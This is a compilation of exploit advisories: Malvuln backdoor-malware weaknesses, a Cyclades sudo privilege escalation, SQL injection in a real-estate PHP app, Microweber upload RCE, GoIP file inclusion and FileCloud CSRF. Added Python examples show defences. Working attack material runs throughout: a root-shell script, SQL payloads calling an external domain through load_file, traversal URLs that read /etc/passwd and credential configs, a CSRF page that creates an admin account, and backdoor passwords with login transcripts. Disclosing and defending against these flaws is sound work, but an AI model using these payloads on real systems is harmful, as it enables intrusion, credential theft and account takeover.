<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/1d12f9b921b38d7b521f12442bdd52d8_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Simpel.12<br />Vulnerability: Insecure Crypto<br />Description: The malware listens on TCP port 22 and requires authentication before the server can be accessed. However, the password "!supernova" is stored within the executable as an unsalted MD5 hash. MD5 is a general-purpose fast hash, not a slow password hash, and the missing salt lets anyone who obtains the hash run much faster cracking attacks using pre-computed dictionaries. In this case the password is recovered immediately, because the hash is a known one that can be found online. Third-party intruders who successfully gain access may then be able to upload executables, which may result in remote code execution.<br /><br />E.g.<br /><br />Name=cRaCkeN<br />Pass=E13820BEDF2B31E01B2C7E59404B1FB7 = !supernova<br /><br />Type: PE32<br />MD5: 1d12f9b921b38d7b521f12442bdd52d8<br />Vuln ID: MVID-2021-0433<br />Disclosure: 12/27/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 22<br /><br />USER cRaCkeN <br />331 Password required for cRaCkeN. <br />PASS !supernova <br />230- [LOGIN] <br />230- [SYSTEM] <br />230- <br />230- Aktiv seit : 1 d, 7 h, 41 min, 57 sec <br />230- <br />230- [SERVER] <br />230- <br />230- Server ist aktiv seit : 28 min, 44 sec <br />230- Server ist aktiv als : Victim <br />230- Traffic (Up/Down) : 0.00/0.00 MB <br />230- Geschw. (Up/Down) : 0/0 KB/sec. <br />230- Bester Speed (Up/Down): 0/0 KB/sec. <br />230- Durchschnitsspeed : 0 KB/sec. genutzt. ││ <br />230- ││ SpaceFree : 26197.29 MB ││ <br />230- ││ Benutzer derzeit : 1 von Max. 100 ││ <br />230- ││ ││<br />230- │├──────────────────────────────[USER]───────────────────────────────┤│ <br />230- ││ ││ <br />230- ││ Willkommen : cRaCkeN <br />230- Sie sind User : 0 von max. 
0 mit ihrem Account <br />230- Ratio : 1:-1 (Credits: 15 MB) <br />230- Ihre IP ist : 192.168.18.130 <br />230- <br />230- <br />230- <br />230 User cRaCkeN logged in.<br />SYST <br />215 215 UNIX Type: L8<br />MKD HATE <br />257 Directory created<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
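<p>To show why the unsalted MD5 storage described above is weak, the following added example (not part of the Malvuln advisory) builds a tiny constructed hash table the way a pre-computed dictionary does, looks a hash up in it, and contrasts that with a salted PBKDF2 scheme in which the same password yields an unrelated hash every time. The candidate word list, the iteration count and the function names are the example's own choices.</p>

```python
import hashlib
import hmac
import os

# Constructed "pre-computed dictionary": hash -> plaintext. Real tables hold
# billions of entries; without a salt one table serves every target at once.
CANDIDATES = ["password", "123456", "!supernova", "letmein"]
PRECOMPUTED_MD5 = {hashlib.md5(w.encode()).hexdigest(): w for w in CANDIDATES}


def lookup_unsalted_md5(stored_hex):
    """Return the plaintext for an unsalted MD5 hash if the table has it, else None.

    This is the weakness the advisory describes: no salt and a fast hash, so a
    single table lookup recovers the password.
    """
    return PRECOMPUTED_MD5.get(stored_hex.lower())


PBKDF2_ITERATIONS = 600_000   # slow on purpose; chosen for this example


def hash_password_salted(password, salt=None):
    """Hardened form: random per-password salt plus a slow, iterated KDF."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password_salted(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), PBKDF2_ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def salted_hashes_differ(password):
    """Same password, two salts, two unrelated hashes: a pre-computed table is useless."""
    return hash_password_salted(password) != hash_password_salted(password)


if __name__ == "__main__":
    # Hash quoted in the advisory (stored by the backdoor without a salt).
    advisory_hash = "E13820BEDF2B31E01B2C7E59404B1FB7"
    print("unsalted table lookup:", lookup_unsalted_md5(advisory_hash))
    stored = hash_password_salted("!supernova")
    print("salted verify:", verify_password_salted("!supernova", stored))
    print("salted hashes differ:", salted_hashes_differ("!supernova"))
```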
<pre><code># Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation<br /># Date: 09 Feb 2022<br /># Exploit Author: @ibby<br /># Vendor Homepage: https://www.vertiv.com/en-us/<br /># Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip<br /># Version: Legacy Versions V_1.0.0 to V_3.3.0-16<br /># Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)<br /># CVE : N/A<br /><br /># This exists because the admin user and the admin group are the defaults on these devices, and the software ships with overly permissive sudo privileges<br />## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014.<br />### This vulnerability does not exist in the newer distributions of the ACS Software.<br /><br />#!/bin/bash<br /><br />## NOTE: To view the vulnerability yourself, uncomment the code below and run it with sudo, since it mounts a file system.<br />## The software is publicly available; this will fetch it and unpack the firmware for you.<br /><br />#TMPDIR=$(mktemp -d)<br />#curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip && binwalk -e FL0536-017.bin<br />#sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 "$TMPDIR" && sudo cat "$TMPDIR/etc/sudoers"<br />#echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky."<br /><br /><br /># ! EXPLOIT CODE BELOW ! 
#<br /># -------<br /># Once you exit the root shell, this will clean up and put the binaries back where they belong.<br />echo "Creating backups of sed & bash binaries"<br />sudo cp /bin/sed /bin/sed.bak<br />sudo cp /bin/bash /bin/bash.bak<br />echo "Saved as bash.bak & sed.bak"<br />sudo mv /bin/bash /bin/sed<br />sudo /bin/sed<br />echo "Replacing our binary with the proper one"<br />sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed<br /><br /></code></pre>
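<p>The advisory does not reproduce the firmware's /etc/sudoers, so the following added example (not the exploit author's code) audits a constructed sudoers sample for the class of rule it describes: a group or user allowed to run file-moving or shell binaries as root, with or without a password. The DANGEROUS set, SAMPLE_SUDOERS and the function names are assumptions made for illustration.</p>

```python
import re

# Binaries that let a sudo-capable user replace, write or spawn other programs
# as root. The advisory's chain renames bash over sed with mv and then runs sed.
DANGEROUS = {"mv", "cp", "bash", "sh", "sed", "vi", "vim", "tee", "dd", "chmod", "chown"}

# Constructed sample sudoers; the real file from the firmware is not reproduced here.
SAMPLE_SUDOERS = """\
# constructed for illustration
Defaults    env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) NOPASSWD: /bin/mv, /bin/cp, /bin/sed, /usr/bin/tail
admin   ALL=(ALL) NOPASSWD: ALL
ops     ALL=(ALL) /usr/bin/systemctl restart sshd
"""

# principal  host = (runas) [TAG:] cmd, cmd ...
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\((.*?)\)\s*)?(.*)$")


def parse_sudoers(text):
    """Return (principal, host, runas, tags, commands) for each user/group rule."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        principal, host, runas, rest = m.groups()
        tags = []
        # Peel off upper-case tags such as NOPASSWD: before the command list.
        while ":" in rest and rest.split(":", 1)[0].strip().isupper():
            tag, rest = rest.split(":", 1)
            tags.append(tag.strip())
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append((principal, host, runas or "root", tags, commands))
    return rules


def risky_rules(text):
    """Return (principal, command, reason) for rules granting root-equivalent power."""
    findings = []
    for principal, _host, _runas, tags, commands in parse_sudoers(text):
        if principal == "root":
            continue
        for cmd in commands:
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((principal, cmd, "unrestricted sudo"))
            elif name in DANGEROUS:
                reason = "root shell or file write primitive"
                if "NOPASSWD" in tags:
                    reason += ", no password"
                findings.append((principal, cmd, reason))
    return findings


if __name__ == "__main__":
    for finding in risky_rules(SAMPLE_SUDOERS):
        print(*finding, sep="  ")
```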
<pre><code># Exploit Title: Windows Explorer Preview Pane HTML File Link Spoofing Vulnerability<br /># Google Dork: n/a<br /># Date: December 25th, 2021<br /># Exploit Author: Eduardo Braun Prado<br /># Vendor Homepage: http://www.microsoft.com/<br /># Software Link: http://www.microsoft.com/<br /># Version: Windows 7, 8.1, 10, 11 (x86/x64 )<br /># Tested on: Windows 7, 8.1, 10, 11 (x86/x64)<br /># CVE : n/a<br /><br />The Windows Explorer Preview Pane allows links contained in an HTML-based file to be spoofed: hovering the mouse over a link shows nothing, and the link cannot be right-clicked to reveal its actual target.<br />The process that renders the HTML file in the Preview Pane is "prevhost.exe", which uses the MSHTML platform.<br /><br />PoC:<br /><br />==============PreviewMe.htm=========================<br /><!DOCTYPE html><br /><html><body><br /><p><b> Click the link to your favorite search engine!</b></p><br /> <p> <a href="http://www.bing.com/">http://www.google.com/</a></p><br /></body></html><br />=====================================================<br /><br />Video demo: https://www.youtube.com/watch?v=A6yhlpRVoV4<br /><br /><br /></code></pre>
<pre><code>## Title: Simple Real Estate Portal System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.20.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.http://stupid_asshole.com\\foh'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker from outside can take control of all accounts of this<br />system by using this vulnerability!<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=view_estate&id=2'+(select<br />load_file('\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html\\foh'))+''<br />AND (SELECT 2183 FROM (SELECT(SLEEP(3)))uXKK) AND 'NnWW'='NnWW<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Simple-Real-Estate-Portal-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/lffled)<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/1d12f9b921b38d7b521f12442bdd52d8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Simpel.12<br />Vulnerability: Port Bounce Scan<br />Description: The malware listens on TCP port 22. Third-party intruders who successfully log on can abuse the backdoor FTP server as a relay for PORT-command bounce scans using Nmap. This allows remote attackers to abuse the infected system and discreetly conduct network port scanning: the scanned host sees the scans as originating from the infected system running the malware's FTP server rather than from the attacker.<br />Type: PE32<br />MD5: 1d12f9b921b38d7b521f12442bdd52d8<br />Vuln ID: MVID-2021-0432<br />Disclosure: 12/27/2021<br /><br />Exploit/PoC:<br />nmap -n -Pn -b cRaCkeN:!supernova@192.168.18.129:22 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-26 21:42 Pacific Standard Time<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://cRaCkeN:!supernova@192.168.18.129:22<br />Connected:220 SSH-1.99-OpenSSH_3.6.1p1.<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 21:43<br />Removed 22<br />Changed my mind about port 22<br />Removed 21<br />Changed my mind about port 21<br />Discovered open port 80/tcp on 192.168.18.237<br />Completed Bounce Scan at 21:43, 2.39s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds<br /></code></pre>
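<p>The bounce works because the server opens data connections wherever the PORT argument points. The following added example (not from the advisory) shows the check an FTP server or a monitor watching its control channel should apply: decode each PORT command and refuse or flag any address other than the client's own. The log format and the addresses in SAMPLE_LOG are constructed, modelled on the scan shown above.</p>

```python
import ipaddress
import re

# PORT h1,h2,h3,h4,p1,p2  ->  host h1.h2.h3.h4, port p1*256+p2
PORT_RE = re.compile(
    r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$", re.I)


def parse_port_argument(command):
    """Decode an FTP PORT command into (ip, port); None if it is malformed."""
    m = PORT_RE.match(command.strip())
    if not m:
        return None
    h = [int(x) for x in m.groups()]
    if any(x > 255 for x in h):
        return None
    return f"{h[0]}.{h[1]}.{h[2]}.{h[3]}", h[4] * 256 + h[5]


def is_bounce_attempt(client_ip, command):
    """True when PORT asks the server to connect somewhere other than the client.

    A server that enforces data address == control address (the RFC 2577
    recommendation) never acts as the relay the scan above depends on.
    """
    parsed = parse_port_argument(command)
    if parsed is None:
        return False
    target_ip, _port = parsed
    return ipaddress.ip_address(target_ip) != ipaddress.ip_address(client_ip)


# Constructed control-channel log, one "<client ip> <command>" per line.
SAMPLE_LOG = """\
192.168.18.130 USER cRaCkeN
192.168.18.130 PASS ********
192.168.18.130 PORT 192,168,18,237,0,21
192.168.18.130 PORT 192,168,18,237,0,22
192.168.18.130 PORT 192,168,18,237,0,80
192.168.18.130 PORT 192,168,18,130,4,1
192.168.18.130 LIST
"""


def bounce_alerts(log_text):
    """Return (client, target_ip, port) for every PORT aimed at a third host."""
    alerts = []
    for line in log_text.splitlines():
        client, _, command = line.partition(" ")
        if is_bounce_attempt(client, command):
            ip, port = parse_port_argument(command)
            alerts.append((client, ip, port))
    return alerts


if __name__ == "__main__":
    for client, ip, port in bounce_alerts(SAMPLE_LOG):
        print(f"bounce attempt from {client}: PORT -> {ip}:{port}")
```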
<pre><code># Exploit Title: Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)<br /># Google Dork: NA<br /># Date: 02/17/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://microweber.org/<br /># Software Link: https://github.com/microweber/microweber<br /># Version: 1.2.11<br /># Tested on: [KALI OS]<br /># CVE : CVE-2022-0557<br /># Reference : https://huntr.dev/bounties/660c89af-2de5-41bc-aada-9e4e78142db8/<br /><br /># Steps To Reproduce<br />- Log in using admin credentials.<br />- Navigate to the User section, then Add/Modify Users.<br />- Change/Add the profile image and select a crafted image file.<br />- A crafted image file here means an image file that carries PHP code for execution.<br />- The crafted file uses the PHP7 extension, e.g. "Sample.php7".<br /><br />- Path of the uploaded crafted shell: https://localhost/userfiles/media/default/shell.php7<br /><br /></code></pre>
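<p>As an added example (not code from the Microweber project or the advisory), the following shows the upload check that stops the step above: an allow-list of image extensions, so that variant names such as .php7 never need to be enumerated in a deny-list, followed by a content check against the declared type. The function name, the allow-list and the magic-byte table are the example's own.</p>

```python
import os

# Allow-list of profile-image extensions. Anything not listed is rejected, so the
# server never has to enumerate php, php7, phtml, phar and every other executable
# variant the way a deny-list must.
ALLOWED_IMAGE_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# Leading bytes each allowed type must start with (taken from the format specs).
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
EXECUTABLE_SEGMENTS = ("php", "phtml", "phar")


def check_image_upload(filename, content):
    """Return (accepted, reason) for an uploaded profile image.

    Order of checks: final extension on the allow-list; no executable extension
    hidden in an inner segment ("shell.php.png"); content starts with the
    declared type's magic bytes; no PHP open tag embedded in the image data.
    """
    base = os.path.basename(filename)
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_IMAGE_EXT:
        return False, f"extension {ext or '(none)'} not allowed"
    inner = base.lower().split(".")[1:-1]
    if any(seg.startswith(EXECUTABLE_SEGMENTS) for seg in inner):
        return False, "executable extension inside filename"
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP tag in image data"
    return True, "accepted"


if __name__ == "__main__":
    # Constructed inputs: the advisory's file name and a minimal PNG header.
    print(check_image_upload("Sample.php7", b"<?php echo 1; ?>"))
    print(check_image_upload("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```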
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/f9dc0a462ada737f36efafac56f22b97.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Visiotrol.10<br />Vulnerability: Insecure Password Storage<br />Description: The malware listens by default on TCP port 4567. The default password "vc" is very weak and stored in a plaintext file named "config.vcs" on disk.<br />Type: PE32<br />MD5: f9dc0a462ada737f36efafac56f22b97<br />Vuln ID: MVID-2021-0431<br />Disclosure: 12/25/2021<br /><br />Exploit/PoC:<br />c:\>type config.vcs<br />vc##4567##OFF##OFF##OFF##<br /></code></pre>
<pre><code># Exploit Title: Dbltek GoIP - Local File Inclusion<br /># Date: 20.02.2022<br /># Exploit Author: Valtteri Lehtinen & Lassi Korhonen<br /># Vendor Homepage: http://en.dbltek.com/index.html<br /># Software Link: -<br /># Version: GHSFVT-1.1-67-5 (firmware version)<br /># Tested on: Target is an IoT device<br /><br /># Exploit summary<br />Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP.<br />The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities.<br /><br />Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up.<br /><br />It is probable that other models and versions of Dbltek GoIP devices are also affected.<br /><br />Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/<br /><br /># Proof of Concept<br />Assuming the device is available on IP 192.168.9.1.<br /><br />Download /etc/passwd<br />http://192.168.9.1/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd<br />http://192.168.9.1/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd<br /><br />Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up)<br />http://192.168.9.1/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat<br />http://192.168.9.1/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat<br /><br /></code></pre>
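<p>An added example (not the vendor's code) of the containment check a handler like frame.html or frame.A100.html above needs: the content or sidebar parameter is percent-decoded, joined to the document root and required to remain beneath it. WEB_ROOT and the function names are assumptions; ADVISORY_URL is the first URL from the proof of concept.</p>

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlparse

# Assumed document root for the localized pages; constructed for this example.
WEB_ROOT = "/var/www/default/en_US"


def resolve_within_root(root, requested):
    """Map a user-supplied page name to a path under root; None if it escapes.

    The value is percent-decoded twice (single and double encoding), backslashes
    are treated as separators, the path is normalised, and the result must still
    lie beneath root. NUL bytes and absolute paths are refused outright.
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded or decoded.startswith(("/", "\\")):
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.replace("\\", "/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def page_param(url, name):
    """Extract the 'content' or 'sidebar' query parameter the frame pages read."""
    values = parse_qs(urlparse(url).query).get(name)
    return values[0] if values else None


def safe_to_include(url):
    """Resolve whichever frame parameter the URL carries; None means refuse it."""
    for name in ("content", "sidebar"):
        value = page_param(url, name)
        if value is not None:
            return resolve_within_root(WEB_ROOT, value)
    return None


# First URL from the advisory.
ADVISORY_URL = ("http://192.168.9.1/default/en_US/frame.html"
                "?content=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd")

if __name__ == "__main__":
    print("advisory URL resolves to:", safe_to_include(ADVISORY_URL))
    print("plain page resolves to:",
          safe_to_include("http://192.168.9.1/default/en_US/frame.html?content=status.html"))
```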
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a7ce38e60cf08f2b234f34043b87e701_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.SilentSpy.10<br />Vulnerability: Authentication Race Condition<br />Description: The malware runs an FTP server on TCP port 21. Third-party attackers who can reach the system before a password has been set can logon using default credentials of admin/admin. The default credentials are displayed in the FTP banner upon connecting.<br />Type: PE32<br />MD5: a7ce38e60cf08f2b234f34043b87e701<br />Vuln ID: MVID-2021-0441<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 21<br />220-+-----------------------+<br />220-| º∩LΘn7 ºpy FTP server |<br />220-+-----------------------+-------------------------------------------------+<br />220-| To use the FTP server type, |<br />220-| USER admin |<br />220-| PASS [servers password] |<br />220-| IF the server doesn't have a password then the password is also 'admin' |<br />220-| Have fun [type HELP for more commands] |<br />220 +-------------------------------------------------------------------------+<br />USER admin<br />331 and the password for admin is .. ??<br />PASS admin<br />230 Welcome<br />SYST<br />215 IBM-PC (Windows95/98/NT based system)<br />HELP<br />214-The following commands are recognized:<br /> ABOR DELE NOOP REIN SITE SYST XRMD<br /> ACCT HELP PASS REST SMNT TYPE SIZE<br /> ALLO LIST PASV RETR STAT USER<br /> APPE MKD PORT RMD STOR XCWD<br /> CDUP MODE PWD RNFR STOU XMKD<br /> CWD NLST QUIT RNTO STRU XPWD<br />214 Send comments to drtinus@yahoo.com<br /></code></pre>
<pre><code># Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)<br /># Date: 2022-02-20<br /># Exploit Author: Masashi Fujiwara<br /># Vendor Homepage: https://www.filecloud.com/<br /># Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2<br /># Version: All versions of FileCloud prior to 21.3 (Fixed: version 21.3.0.18447)<br /># Tested on:<br /># OS: Ubuntu 18.04.6 LTS (Docker)<br /># Apache: 2.4.52<br /># FileCloud: 21.2.4.17315<br /># CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)<br /><br /># Conditions<br />1. Only vulnerable if cookies have SameSite set to None (SameSite=None).<br /> echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php<br />2. Use https for the target URL (when cookies are set with SameSite=None, Secure must also be set).<br /><br /># PoC (HTML)<br /><html><br /><head><br /><meta http-equiv="Pragma" content="no-cache"><br /><meta http-equiv="Cache-Control" content="no-cache"><br /><br /><script><br />function init(){<br /> let myFormData = new FormData();<br /> let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});<br /> myFormData.append("uploadFormElement", fileContent, "user.csv");<br /> fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});<br />}<br /></script><br /></head><br /><body onload="init()"><br />CSRF PoC for CVE-2022-25241<br /><br />Creates the user "hacker" with password Password1 via CSV file upload.<br /></body><br /></html><br /><br /><br /><br /># HTTPS Request<br />POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1<br />Host: 192.168.159.129:8443<br />Cookie: 
X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493<br />Content-Length: 365<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br />Connection: close<br /><br />------WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br />Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"<br />Content-Type: application/vnd.ms-excel<br /><br />UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br />hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES<br /><br />------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--<br /><br /><br /><br /># CSV file format<br />UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br />hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES<br /><br /><br /></code></pre>
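<p>The PoC works because the browser attaches the session cookies (SameSite=None) while the attacker's page never gets to read them. The following added example, not FileCloud's code, shows the server-side check that blocks the request above: an Origin/Referer comparison plus a double-submit rule requiring the value of the X-XSRF-TOKEN-admin cookie to be echoed in a request header. The header name X-XSRF-TOKEN, SITE_ORIGIN and the function names are assumptions; the header dictionaries are constructed from the request shown.</p>

```python
import hmac
from http.cookies import SimpleCookie
from urllib.parse import urlparse

SITE_ORIGIN = "https://192.168.159.129:8443"   # the FileCloud host from the advisory
TOKEN_COOKIE = "X-XSRF-TOKEN-admin"            # cookie name seen in the request
TOKEN_HEADER = "x-xsrf-token"                  # assumed header the client must send


def parse_cookies(header):
    jar = SimpleCookie()
    jar.load(header or "")
    return {k: v.value for k, v in jar.items()}


def csrf_check(method, headers):
    """Return (allowed, reason) for a request to a state-changing endpoint.

    Two independent checks: Origin (or Referer) must be our own origin, and the
    anti-CSRF token must arrive in a request header equal to the cookie copy.
    Cross-site script can make the browser send the cookie but cannot read it,
    so it cannot produce the matching header.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    h = {k.lower(): v for k, v in headers.items()}
    source = h.get("origin") or h.get("referer")
    if source:
        p = urlparse(source)
        if f"{p.scheme}://{p.netloc}" != SITE_ORIGIN:
            return False, "cross-origin request"
    elif h.get("sec-fetch-site", "same-origin") not in ("same-origin", "none"):
        return False, "cross-site fetch metadata"
    cookie_token = parse_cookies(h.get("cookie")).get(TOKEN_COOKIE)
    header_token = h.get(TOKEN_HEADER)
    if not cookie_token or not header_token or not hmac.compare_digest(cookie_token, header_token):
        return False, "missing or mismatched CSRF token"
    return True, "ok"


# Constructed headers modelled on the advisory's request: the cookie rides along
# because of SameSite=None, but the attacker page cannot add the token header.
ATTACK_HEADERS = {
    "Origin": "https://attacker.example",
    "Cookie": "X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW",
}
LEGIT_HEADERS = {
    "Origin": SITE_ORIGIN,
    "Cookie": "X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin",
    "X-XSRF-TOKEN": "rhedxvo0gullbvzkgwwv",
}

if __name__ == "__main__":
    print("cross-site PoC:", csrf_check("POST", ATTACK_HEADERS))
    print("same-origin admin UI:", csrf_check("POST", LEGIT_HEADERS))
```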